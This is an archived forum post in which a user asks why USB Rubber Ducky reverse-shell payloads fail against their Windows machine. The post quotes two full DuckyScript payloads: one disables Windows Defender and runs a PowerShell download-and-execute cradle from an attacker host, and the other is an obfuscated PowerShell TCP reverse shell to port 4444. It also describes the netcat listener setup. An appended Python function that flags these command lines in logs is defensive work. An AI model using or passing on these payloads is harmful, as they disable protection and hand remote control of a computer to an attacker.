Dominik75 Posted September 16, 2022

Hello forum members,

following YouTube videos on "Get a Reverse Shell with the USB Rubber Ducky by downloading payloads from https://shop.hak5.org/blogs/payloads/tagged/usb-rubber-ducky+remote-access and REVERSEDUCKY loads," I could not properly make any of the payloads for remote access. I did everything like in the videos in this regard and the included payloads on the HAK5 website. Both computers are on the same network. I put a rubber ducky into my Windows computer (you can see that something is happening), but on the second computer (the attacker), despite the fact that the server works: python -m http.server 8000 and the second panel nc -l -p 4444. Unfortunately, I cannot connect to Windows through the shell. Payload.ps1 is on the server of course. Does it matter? I also have ESET antivirus installed. I am asking for any tips.

Sample loads:

```
REM Turn off Windows Defender and start reverse shell
REM
DELAY 1000
GUI r
DELAY 200
REM Start an elevated powershell instance which will disable Windows Defender.
STRING powershell -w hidden start powershell -A 'Set-MpPreference -DisableRea $true' -V runAs
ENTER
DELAY 1000
REM if you need administrator [left, enter and delay 1000]
LEFT
ENTER
DELAY 1000
ALT y
DELAY 1000
GUI r
DELAY 100
STRING powershell -w hidden "IEX (New-Object Net.WebClient).DownloadString('http://my_IP/payload.ps1');"
ENTER
STRING exit
ENTER
```

Another load:

```
REM ReverseDucky2
REM Version 1.3
REM OS: Windows / Linux(?) (Not tested with Powershell on Linux)
REM Author: 0iphor13
REM Reverse shell executed in the background
REM Fill in Attacker-IP and Port in Line 19
REM DON'T FORGET TO START LISTENER
DELAY 1500
GUI r
DELAY 500
STRING powershell -NoP -NonI -W hidden
DELAY 250
ENTER
DELAY 200
STRING $c=nEw-oBjECt SYstEm.NEt.SOcKEts.TCPClIEnt("my_IP",4444);$s=$c.GetSTreAm();[byte[]]$b=0..65535|%{0};whILe(($i=$s
DELAY 100
STRING .REad($b,0,$b.LeNgTh))-ne 0){;$d=(NEw-OBjeCT -TYpeNamE sYsTeM.TeXt.ASCIIEncoding).GetStRIng($b,0,$i);$z=(ieX $d 2>&1|oUt
DELAY 100
STRING -STriNG);$x=$z+"PS "+(pwd)+"> ";$y=([text.encoding]::ASCII).GEtByTEs($x);$s.WrIte($y,0,$y.LEnGTh);$s.FlUSh()};$c.CloSE()
DELAY 100
ENTER
```
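Seen from the defending side, the command lines typed by the two payloads in the post above are what process-creation and PowerShell logging record on the Windows host. The following is an added example, not part of the original post or of the Hak5 payloads: a small triage function over logged command-line strings. The indicator names, the regexes and the sample lines (abbreviated from the post, plus one constructed benign line) are assumptions chosen for illustration.

```python
import re

# Indicator name -> regex applied to the lower-cased command line (assumed rule set).
INDICATORS = {
    "defender_tamper": re.compile(r"set-mppreference\b.*-disable"),
    "hidden_window": re.compile(r"-w(in(dowstyle)?)?\s+hidden"),
    "download_cradle": re.compile(r"\biex\b.*downloadstring|downloadstring.*\|\s*iex\b"),
    "tcp_client_iex": re.compile(r"net\.sockets\.tcpclient.*\biex\b"),
}

# Usual spellings; any other mixed-case spelling suggests an attempt to dodge string signatures.
CANONICAL = ("New-Object", "TCPClient", "Out-String", "GetStream", "IEX")


def mangled_case(cmdline):
    """True if a known keyword appears in neither its usual, lower nor upper case form."""
    for word in CANONICAL:
        for m in re.finditer(re.escape(word), cmdline, re.IGNORECASE):
            if m.group(0) not in (word, word.lower(), word.upper()):
                return True
    return False


def triage(cmdline):
    """Return the sorted names of all indicators that fire on one command line."""
    lowered = cmdline.lower()
    hits = [name for name, rx in INDICATORS.items() if rx.search(lowered)]
    if mangled_case(cmdline):
        hits.append("mangled_case")
    return sorted(hits)


# Constructed sample log lines: the first three are abbreviated from the post, the last is benign.
SAMPLES = [
    r"""powershell -w hidden start powershell -A 'Set-MpPreference -DisableRea $true' -V runAs""",
    r"""powershell -w hidden "IEX (New-Object Net.WebClient).DownloadString('http://my_IP/payload.ps1');" """,
    r"""$c=nEw-oBjECt SYstEm.NEt.SOcKEts.TCPClIEnt("my_IP",4444);$s=$c.GetSTreAm();$z=(ieX $d 2>&1|oUt-STriNG)""",
    r"""powershell -NoProfile -Command "Get-ChildItem C:\Temp | Out-String" """,
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(triage(line), "<-", line[:60])
```

The keyword match in `mangled_case` is a plain substring search, so a production rule would add word boundaries and a longer keyword list.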
Archived
This topic is now archived and is closed to further replies.